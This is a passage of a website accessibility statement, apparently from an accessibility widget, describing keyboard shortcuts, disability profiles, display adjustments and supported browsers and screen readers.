keys, close them with Esc, trigger buttons and links using the Enter key,
navigate between radio and checkbox elements using the arrow keys, and fill
them in with the Spacebar or Enter key.
Additionally, keyboard users will find content-skip menus available at any
time by clicking Alt+2, or as the first element of the site while navigating
with the keyboard. The background process also handles triggered popups by
moving the keyboard focus towards them as soon as they appear, not allowing
the focus to drift outside.
Users can also use shortcuts such as “M” (menus), “H” (headings), “F”
(forms), “B” (buttons), and “G” (graphics) to jump to specific elements.
Disability profiles supported on our website
* Epilepsy Safe Profile: this profile enables people with epilepsy to safely
use the website by eliminating the risk of seizures resulting from flashing
or blinking animations and risky color combinations.
* Vision Impaired Profile: this profile adjusts the website so that it is
accessible to the majority of visual impairments such as Degrading Eyesight,
Tunnel Vision, Cataract, Glaucoma, and others.
* Cognitive Disability Profile: this profile provides various assistive
features to help users with cognitive disabilities such as Autism, Dyslexia,
CVA, and others, to focus on the essential elements more easily.
* ADHD Friendly Profile: this profile significantly reduces distractions and
noise to help people with ADHD, and Neurodevelopmental disorders browse,
read, and focus on the essential elements more easily.
* Blind Users Profile (Screen-readers): this profile adjusts the website to be
compatible with screen-readers such as JAWS, NVDA, VoiceOver, and TalkBack. A
screen-reader is installed on the blind user’s computer, and this site is
compatible with it.
* Keyboard Navigation Profile (Motor-Impaired): this profile enables
motor-impaired persons to operate the website using the keyboard Tab,
Shift+Tab, and the Enter keys. Users can also use shortcuts such as “M”
(menus), “H” (headings), “F” (forms), “B” (buttons), and “G” (graphics) to
jump to specific elements.
Additional UI, design, and readability adjustments
1. Font adjustments – users can increase and decrease its size, change its
family (type), adjust the spacing, alignment, line height, and more.
2. Color adjustments – users can select various color contrast profiles such as
light, dark, inverted, and monochrome. Additionally, users can swap color
schemes of titles, texts, and backgrounds with over seven different coloring
options.
3. Animations – epileptic users can stop all running animations with the click
of a button. Animations controlled by the interface include videos, GIFs,
and CSS flashing transitions.
4. Content highlighting – users can choose to emphasize essential elements such
as links and titles. They can also choose to highlight focused or hovered
elements only.
5. Audio muting – users with hearing devices may experience headaches or other
issues due to automatic audio playing. This option lets users mute the
entire website instantly.
6. Cognitive disorders – we utilize a search engine linked to Wikipedia and
Wiktionary, allowing people with cognitive disorders to decipher meanings of
phrases, initials, slang, and others.
7. Additional functions – we allow users to change cursor color and size, use a
printing mode, enable a virtual keyboard, and many other functions.
Assistive technology and browser compatibility
We aim to support as many browsers and assistive technologies as possible, so
our users can choose the best fitting tools for them, with as few limitations as
possible. Therefore, we have worked very hard to be able to support all major
systems that comprise over 95% of the user market share, including Google
Chrome, Mozilla Firefox, Apple Safari, Opera and Microsoft Edge, JAWS, and NVDA
(screen readers), both for Windows and MAC users.
Notes, comments, and feedback
Despite our very best efforts to allow anybody to adjust the website to their
needs, there may still be pages or sections that are not fully accessible, are
in the process of becoming accessible, or are lacking an adequate technological
solution to make them accessible. Still, we are continually improving our
accessibility, adding, updating, improving its options and features, and
developing and adopting new technologies. All this is meant to reach the optimal
level of accessibility following technological advancements. If you wish to
contact the website’s owner, please use the website's form
Hide Accessibility Interface? Please note: If you choose to hide the
accessibility interface, you won't be able to see it anymore, unless you clear
your browsing history and data. Are you sure that you wish to hide the
interface?
Accept Cancel
Continue
Processing the data, please give it a few seconds...
Press Alt+1 for screen-reader mode
Sumo